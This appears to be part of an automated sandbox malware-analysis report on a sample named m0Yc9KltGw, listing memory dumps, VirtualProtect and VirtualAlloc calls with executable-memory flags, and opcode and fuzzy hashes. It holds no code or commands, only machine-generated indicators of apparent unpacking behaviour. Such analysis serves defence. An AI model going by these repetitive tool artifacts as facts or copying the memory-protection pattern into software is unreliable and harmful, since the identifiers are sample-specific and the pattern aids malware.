                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: O5>X
                                • API String ID: 544645111-3840307895
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: A=F2
                                • API String ID: 544645111-1084960644
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: 396_
                                • API String ID: 544645111-2594736988
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: =NEK
                                • API String ID: 4275171209-889289970
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0041E720
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0041E720
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: ad5348629e56da73c128a1b4bca9fd8fd05985c758aa73c9d6435a515f042a0c
                                • Instruction ID: 7d855956d50402d9f7916bc5ef18b9a3e1da058d8c8a39eecb436c4325a4adc2
                                • Opcode Fuzzy Hash: ad5348629e56da73c128a1b4bca9fd8fd05985c758aa73c9d6435a515f042a0c
                                • Instruction Fuzzy Hash: 1C31A3F2E042146BF7248A14DC44FFB7339EBC4310F1481F9E90E96A44E7399AC58A21
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 4e017ff6e3a2b054763130df4fb823248cc0ef604f3877ffaf01eef7a8ce4da3
                                • Instruction ID: 8e1fa6cd1a69b0ac3206bfda3fe232b6737464126d36bcc8fc8c75a05b921802
                                • Opcode Fuzzy Hash: 4e017ff6e3a2b054763130df4fb823248cc0ef604f3877ffaf01eef7a8ce4da3
                                • Instruction Fuzzy Hash: 9D31E1B1C041659FE724DB64DC44BEBBBB8EF80310F0085FAE84D66284D6399AC9CF91
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: ff4982cbfff9e01290382924ecbba172b4cfb6dd4ef23e964a4e6b4c63e1fc18
                                • Instruction ID: cc6ae383c0818ce0cddc3ae8adaafe92286ea71800c929d31a4a6b5855c2a3d6
                                • Opcode Fuzzy Hash: ff4982cbfff9e01290382924ecbba172b4cfb6dd4ef23e964a4e6b4c63e1fc18
                                • Instruction Fuzzy Hash: 5C3127B2D042695BE7108774CC58BEBBFF6AFC1300F0981F9C48C26580D6395ED28A95
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5fe5cf0710a085e0274d02e127f9eeaa699544e474fe57884f3e857fe0b7a646
                                • Instruction ID: 5f954aa0c4ddb898eab6439c2c9a233a6bdfdec6ef6a1b70e69242cf1a2bee87
                                • Opcode Fuzzy Hash: 5fe5cf0710a085e0274d02e127f9eeaa699544e474fe57884f3e857fe0b7a646
                                • Instruction Fuzzy Hash: 0B41E6749049698BDB25CB95DC94AEEBB71BF89306F5840EAD81D9A200D6389EC1CF11
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 8919e7fa10de618230a943befc8a3a8e16a67e2c86fecaaad87ba55b4280a643
                                • Instruction ID: 7f99f38c547632866d87ea786536627641fa5b86f1716259412bee2abf857c06
                                • Opcode Fuzzy Hash: 8919e7fa10de618230a943befc8a3a8e16a67e2c86fecaaad87ba55b4280a643
                                • Instruction Fuzzy Hash: 7D31ABB1E146189FE7508A14EC95EFB77B8EB44310F1042BBE90EA2680D67D6EC18E57
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 239dfeb65a5b546ffbea2571bb1e52a933c89467b824402d88d5f2c71cb356b7
                                • Instruction ID: bcd1cdb03aeede774a1120e124171fb2566ab0a8a20e8d282e2a258484877c25
                                • Opcode Fuzzy Hash: 239dfeb65a5b546ffbea2571bb1e52a933c89467b824402d88d5f2c71cb356b7
                                • Instruction Fuzzy Hash: BF31B4B2D14258ABEB208F24CC44FFAB379EB84300F1085E5E90D96640DB399EC58E61
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: d1bc0c3c3d54e404124d062b91a25bd3cf0f2015179254b54a74b803e05d3b14
                                • Instruction ID: faaac7964df34931971cfb33f1a669da848cd40cdbaab09df57bd9d8283eac76
                                • Opcode Fuzzy Hash: d1bc0c3c3d54e404124d062b91a25bd3cf0f2015179254b54a74b803e05d3b14
                                • Instruction Fuzzy Hash: 9F318DB1E146289FE7508A14DC91EFB77B8EB44310F1442FAE90EA2680D67D6FC08E56
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 67a6c5c1d7ac4f1489e7fa154d66fdbd68411b54d95c3e0eb7af296dfab4e2a4
                                • Instruction ID: d02bd3fec12ece5aef00ec91af9c2085a20bbe6b027b67bbdaf8bc1d4bf1a8bb
                                • Opcode Fuzzy Hash: 67a6c5c1d7ac4f1489e7fa154d66fdbd68411b54d95c3e0eb7af296dfab4e2a4
                                • Instruction Fuzzy Hash: 54318DB1E146289FE7548A14DC91EFB77B8EB44310F1442FAE90EA2680D67D6FC08E56
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 53551eaea6eff7480147f545dffd5159921a097fa63289ea9ac2efc7cbb58808
                                • Instruction ID: 1825f9431c9993e98292f7310788765b9a676f82f7c13db0ac91bc4126d8abad
                                • Opcode Fuzzy Hash: 53551eaea6eff7480147f545dffd5159921a097fa63289ea9ac2efc7cbb58808
                                • Instruction Fuzzy Hash: 84318DB1E146289FE7548A14DC91EFB77B8EB44310F1442FAE90EA2680D67D6FC08E56
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 4a87f2a009c4f392ff1578dfbf601089019f9664b7fb2fca7d2dae7c93fd07eb
                                • Instruction ID: 3c2afa716c1086d721a4355e6d84769ae053ce35f8ef75f140b1a70a15aedccf
                                • Opcode Fuzzy Hash: 4a87f2a009c4f392ff1578dfbf601089019f9664b7fb2fca7d2dae7c93fd07eb
                                • Instruction Fuzzy Hash: 35E186B4E046688FEB24CA14DC94BAAB776FF84305F1082EAD40DA7688D7795EC58F11
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
